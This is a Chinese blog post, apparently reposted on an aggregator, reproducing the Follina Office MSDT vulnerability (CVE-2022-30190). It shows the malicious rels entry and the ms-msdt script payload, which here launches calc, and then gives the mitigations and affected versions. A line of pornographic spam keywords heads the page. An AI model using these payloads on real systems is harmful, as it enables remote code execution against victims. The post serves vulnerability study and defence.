国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

【漏洞復(fù)現(xiàn)】Microsoft Office MSDT 遠程代碼執(zhí)行漏洞 (CVE-2022-30190)

這篇具有很好參考價值的文章主要介紹了【漏洞復(fù)現(xiàn)】Microsoft Office MSDT 遠程代碼執(zhí)行漏洞 (CVE-2022-30190)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

0x01 Microsoft Office

Microsoft Office是由Microsoft(微軟)公司開發(fā)的一套辦公軟件套裝。常用組件有 Word、Excel、PowerPoint等。

0x02 漏洞簡介

該文檔使用 Word 遠程模板功能從遠程網(wǎng)絡(luò)服務(wù)器檢索 HTML 文件,該服務(wù)器使用 ms-msdt MSProtocol URI 方案加載代碼并執(zhí)行 PowerShell,禁用宏,仍能通過MSDT功能執(zhí)行代碼(惡意 Word 文檔通常用于通過宏執(zhí)行代碼)。Microsoft Defender 當前無法阻止執(zhí)行。受保護的視圖啟動無需打開文檔即可運行。

0x03 漏洞復(fù)現(xiàn)

步驟:

1、 新建一個word 文檔,在里面隨便輸入東西

【漏洞復(fù)現(xiàn)】Microsoft Office MSDT 遠程代碼執(zhí)行漏洞 (CVE-2022-30190)?2、 將 word 文檔后綴更改為 zip

3、 將 zip 包解壓打開,編輯文件夾下的 word 目錄下的_rels 下的document.xml.rels

【漏洞復(fù)現(xiàn)】Microsoft Office MSDT 遠程代碼執(zhí)行漏洞 (CVE-2022-30190)

?4 、 按照格式加入

<Relationship  Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObje ct" Target="mhtml:http://localhost:80/exploit.html!x-usc:http://localhost:80/exploit.html" TargetMode="External"/>

【漏洞復(fù)現(xiàn)】Microsoft Office MSDT 遠程代碼執(zhí)行漏洞 (CVE-2022-30190)

5、 然后將文件夾打包成 zip,再改后綴為docx

6、 建一個文件夾作為web 站點目錄,新建html 文件添加

<script>
location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=?
IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\\\\localhost\\c$\\windows\\system32\\calc)/.exe\"";
</script>

【漏洞復(fù)現(xiàn)】Microsoft Office MSDT 遠程代碼執(zhí)行漏洞 (CVE-2022-30190)

7、 點開改好后的word 文檔即可

【漏洞復(fù)現(xiàn)】Microsoft Office MSDT 遠程代碼執(zhí)行漏洞 (CVE-2022-30190)

?目前發(fā)現(xiàn)的POC(彈出計算器)

GitHub - chvancooten/follina.py: POC to replicate the full 'Follina' Office RCE vulnerability for testing purposesPOC to replicate the full 'Follina' Office RCE vulnerability for testing purposes - GitHub - chvancooten/follina.py: POC to replicate the full 'Follina' Office RCE vulnerability for testing purposeshttps://github.com/chvancooten/follina.py

GitHub - onecloudemoji/CVE-2022-30190: CVE-2022-30190 Follina POCCVE-2022-30190 Follina POC. Contribute to onecloudemoji/CVE-2022-30190 development by creating an account on GitHub.https://github.com/onecloudemoji/CVE-2022-30190

作者給出的幾種方法【漏洞復(fù)現(xiàn)】Microsoft Office MSDT 遠程代碼執(zhí)行漏洞 (CVE-2022-30190)

【漏洞復(fù)現(xiàn)】Microsoft Office MSDT 遠程代碼執(zhí)行漏洞 (CVE-2022-30190)

0x04 漏洞評定

  • 公開程度:已發(fā)現(xiàn)在野利用

  • 利用條件:需要打開或點擊特定文件

  • 漏洞危害:高危 任意代碼執(zhí)行

0x05 修復(fù)方案

官方修復(fù)方案:

目前微軟暫未針對此漏洞發(fā)布安全補丁,提供了臨時修復(fù)措施進行防護:

禁用MSDT URL協(xié)議

1、以管理員身份運行命令提示符。

2、備份注冊表項后,執(zhí)行命令

reg export HKEY_CLASSES_ROOT\ms-msdt filename

3、再執(zhí)行命令

reg delete HKEY_CLASSES_ROOT\ms-msdt /f

撤銷該禁用:

1、以管理員身份運行命令提示符。

2、備份注冊表項后,執(zhí)行命令

reg import filename

官方參考鏈接:

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

Microsoft Defender在1.367.719.0及以上版本支持此漏洞的檢測和防護,Microsoft Defender for Endpoint 已為用戶提供檢測和警報;Microsoft365 Defender門戶中的以下警報標題可以提示網(wǎng)絡(luò)上的威脅活動:Office 應(yīng)用程序的可疑行為、Msdt.exe 的可疑行為。

0x05 影響范圍

影響版本:

Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 for ARM64-based Systems
Windows 11 for x64-based Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server 2022 Azure Edition Core Hotpatch
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
?

其他修復(fù)方案:

1、關(guān)閉資源管理器的預(yù)覽窗格,不輕易打開陌生鏈接或下載來歷不明的文檔;

2、如果您使用Microsoft Defender的 Attack Surface Reduction(ASR)規(guī)則,則可在Block模式下激活“阻止所有Office應(yīng)用程序創(chuàng)建子進程”規(guī)則。若您還沒有使用ASR規(guī)則,可先在Audit模式下運行規(guī)則,觀察結(jié)果以確保不會對系統(tǒng)造成不利影響;

3、通過創(chuàng)建ASL規(guī)則防止Office產(chǎn)生子進程:文章來源地址http://www.zghlxwxcb.cn/news/detail-449273.html

到了這里,關(guān)于【漏洞復(fù)現(xiàn)】Microsoft Office MSDT 遠程代碼執(zhí)行漏洞 (CVE-2022-30190)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • Office遠程代碼執(zhí)行漏洞(CVE-2017-11882)漏洞復(fù)現(xiàn)

    Office遠程代碼執(zhí)行漏洞(CVE-2017-11882)漏洞復(fù)現(xiàn)

    CVE-2017-11882允許攻擊者在當前用戶的上下文中運行任意代碼,導(dǎo)致無法正確處理內(nèi)存中的對象,即為“ Microsoft Office Memory Corruption Vulnerability “,棧溢出的遠程執(zhí)行漏洞 該漏洞是在 EQNEDT32.EXE 組件的緩沖區(qū)溢出導(dǎo)致。當受害用戶打開Office文檔時就有可能被漏洞利用,危害極大。

    2024年02月12日
    瀏覽(24)
  • CVE-2018-0886-Microsoft Windows CredSSP 遠程執(zhí)行代碼漏洞復(fù)現(xiàn)

    CVE-2018-0886-Microsoft Windows CredSSP 遠程執(zhí)行代碼漏洞復(fù)現(xiàn)

    cve-2018-0886,網(wǎng)絡(luò)

    2024年02月12日
    瀏覽(17)
  • CVE-2022-21907 Microsoft Windows HTTP 協(xié)議棧遠程代碼執(zhí)行漏洞復(fù)現(xiàn)

    CVE-2022-21907 Microsoft Windows HTTP 協(xié)議棧遠程代碼執(zhí)行漏洞復(fù)現(xiàn)

    目錄 0x01 聲明: 0x02 簡介: 0x03 漏洞概述: 0x04 影響版本: 0x05 環(huán)境搭建: 下載: 開啟IIS: 0x06 漏洞復(fù)現(xiàn): 利用POC: 0x07 流量分析: 客戶端: 0x08 修復(fù)建議: ????????僅供學(xué)習(xí)參考使用,請勿用作違法用途,否則后果自負。 ????????Microsoft Windows HTTP 協(xié)議棧(HTTP.

    2024年02月03日
    瀏覽(16)
  • CVE-2022-30190:Microsoft Office MSDT Rce漏洞

    CVE-2022-30190:Microsoft Office MSDT Rce漏洞

    讀者需知 本文僅供學(xué)習(xí)使用,由于傳播和利用此文所造成的損失均由使用者本人負責(zé),文章作者不為此承擔責(zé)任 目錄 簡介 影響版本 復(fù)現(xiàn)過程 風(fēng)險危害 修復(fù)意見 MSDT(Microsoft Support Diagnostics Tool,微軟支持診斷工具)是一個Windows實用程序,用于排除故障并收集診斷數(shù)據(jù)以供

    2024年02月05日
    瀏覽(24)
  • MICROSOFT OFFICE MSDT操作系統(tǒng)命令注入漏洞(CVE-2022-30190)

    MICROSOFT OFFICE MSDT操作系統(tǒng)命令注入漏洞(CVE-2022-30190)

    目錄 漏洞概述 受到影響的產(chǎn)品和版本 漏洞復(fù)現(xiàn) 1、搭建靶場 2、攻擊復(fù)現(xiàn) 一、執(zhí)行系統(tǒng)程序 二、執(zhí)行系統(tǒng)命令 修復(fù) Microsoft Windows Support Diagnostic Tool是美國微軟(Microsoft)公司的收集信息以發(fā)送給 Microsoft 支持的工具(Windows上的微軟支持診斷工具中存在此漏洞)。當從Word等

    2024年02月06日
    瀏覽(19)
  • 漏洞復(fù)現(xiàn)-Drupal遠程代碼執(zhí)行漏洞(CVE-2018-7602)

    漏洞復(fù)現(xiàn)-Drupal遠程代碼執(zhí)行漏洞(CVE-2018-7602)

    Drupal 7.x 和 8.x 的多個子系統(tǒng)中存在一個遠程執(zhí)行代碼漏洞。這可能允許攻擊者利用 Drupal 站點上的多個攻擊媒介,從而導(dǎo)致該站點受到威脅。此漏洞與 Drupal 核心 - 高度關(guān)鍵 - 遠程代碼執(zhí)行 - SA-CORE-2018-002 有關(guān)。SA-CORE-2018-002 和此漏洞都在野外被利用。 -c 后面接命令,緊隨賬號

    2024年02月16日
    瀏覽(23)
  • 漏洞復(fù)現(xiàn) CVE-2023-0297( pyload遠程代碼執(zhí)行漏洞 )

    在 addcrypted2() 函數(shù)中,對傳入的參數(shù) jk 解析后用 eval_js() 作為 JS 語句執(zhí)行。 利用 JS 中 pyimport 導(dǎo)入 OS 包,執(zhí)行系統(tǒng)命令(文件操作,進程管理),還可以利用 os.system() 執(zhí)行 shell 命令。 構(gòu)建 payload 過程比較簡單,只要傳入所需的 package, crypted, jk, passwords 四個參數(shù)即可,這里

    2024年02月08日
    瀏覽(22)
  • CVE-2019-0708遠程桌面服務(wù)遠程執(zhí)行代碼漏洞復(fù)現(xiàn)

    CVE-2019-0708遠程桌面服務(wù)遠程執(zhí)行代碼漏洞復(fù)現(xiàn)

    1、相關(guān)簡介 Windows再次被曝出一個破壞力巨大的高危遠程漏洞CVE-2019-0708。攻擊者一旦成功利用該漏洞,便可以在目標系統(tǒng)上執(zhí)行任意代碼,包括獲取敏感信息、執(zhí)行遠程代碼、發(fā)起拒絕服務(wù)攻擊等等攻擊行為。2019年5月14日微軟官方發(fā)布安全補丁,修復(fù)了windows遠程桌面服務(wù)的遠

    2024年02月10日
    瀏覽(23)
  • [漏洞復(fù)現(xiàn)] jenkins 遠程代碼執(zhí)行 (CVE-2019-100300)

    [漏洞復(fù)現(xiàn)] jenkins 遠程代碼執(zhí)行 (CVE-2019-100300)

    擁有Overall/Read 權(quán)限的用戶可以繞過沙盒保護,在jenkins可以執(zhí)行任意代碼。此漏洞需要一個賬號密碼和一個存在的job。 Jenkins的pipeline主要是通過一個配置文件或者job里面的pipeline腳本配置來設(shè)定每個job的步驟. pipeline定義了幾乎所有要用到的流程, 比如執(zhí)行shell, 存檔, 生成測試

    2024年02月16日
    瀏覽(21)
  • CVE-2019-11043(PHP遠程代碼執(zhí)行漏洞)復(fù)現(xiàn)

    CVE-2019-11043(PHP遠程代碼執(zhí)行漏洞)復(fù)現(xiàn)

    今天繼續(xù)給大家介紹滲透測試相關(guān)知識,本文主要內(nèi)容是CVE-2019-11043(PHP遠程代碼執(zhí)行漏洞)復(fù)現(xiàn)。 免責(zé)聲明: 本文所介紹的內(nèi)容僅做學(xué)習(xí)交流使用,嚴禁利用文中技術(shù)進行非法行為,否則造成一切嚴重后果自負! 再次強調(diào):嚴禁對未授權(quán)設(shè)備進行滲透測試! CVE-2019-11043漏

    2024年02月06日
    瀏覽(22)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包